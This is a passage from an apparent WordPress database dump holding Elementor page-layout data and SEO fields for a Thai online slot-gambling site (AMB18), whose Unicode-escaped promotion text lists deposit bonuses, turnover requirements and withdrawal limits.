s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:15:\"activeItemIndex\";i:1;s:16:\"site_description\";s:160:\"megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ\";}'),(310,63,'_elementor_data','[]'),(311,63,'_elementor_version','3.32.5'),(312,63,'_elementor_pro_version','3.32.3'),(320,27,'_yoast_wpseo_focuskw','โปรโมชั่น'),(321,27,'_yoast_wpseo_linkdex','75'),(322,27,'_elementor_edit_mode','builder'),(323,27,'_elementor_template_type','wp-page'),(324,27,'_elementor_version','3.35.5'),(325,27,'_elementor_pro_version','3.32.3'),(326,64,'_elementor_edit_mode','builder'),(327,64,'_elementor_template_type','wp-page'),(328,64,'_elementor_version','3.32.5'),(329,64,'_elementor_pro_version','3.32.3'),(330,65,'_elementor_edit_mode','builder'),(331,65,'_elementor_template_type','wp-page'),(332,65,'_elementor_version','3.32.5'),(333,65,'_elementor_pro_version','3.32.3'),(334,27,'_wp_page_template','default'),(335,27,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(336,27,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 AMB18 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e36\\u0e07\\u0e08\\u0e32\\u0e01 AMB18 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e40\\u0e15\\u0e34\\u0e21\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e44\\u0e14\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e16\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e4a\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e21\\u0e14\\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e38\\u0e01 \\u0e46 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e1b\\u0e35\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e32\\u0e15\\u0e4c \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e14\\u0e39\\u0e04\\u0e38\\u0e49\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e2b\\u0e32\\u0e22\\u0e2b\\u0e48\\u0e27\\u0e07\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e44\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1a\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e2d\\u0e47\\u0e19\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e17\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e41\\u0e15\\u0e48\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e08\\u0e30\\u0e1b\\u0e31\\u0e07\\u0e41\\u0e04\\u0e48\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e25\\u0e37\\u0e21\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e04\\u0e39\\u0e48\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-AMB18.webp\",\"id\":346,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-AMB18.webp\",\"id\":347,\"size\":\"\",\"alt\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-AMB18.webp\",\"id\":350,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Banner-AMB18.webp\",\"id\":355,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" 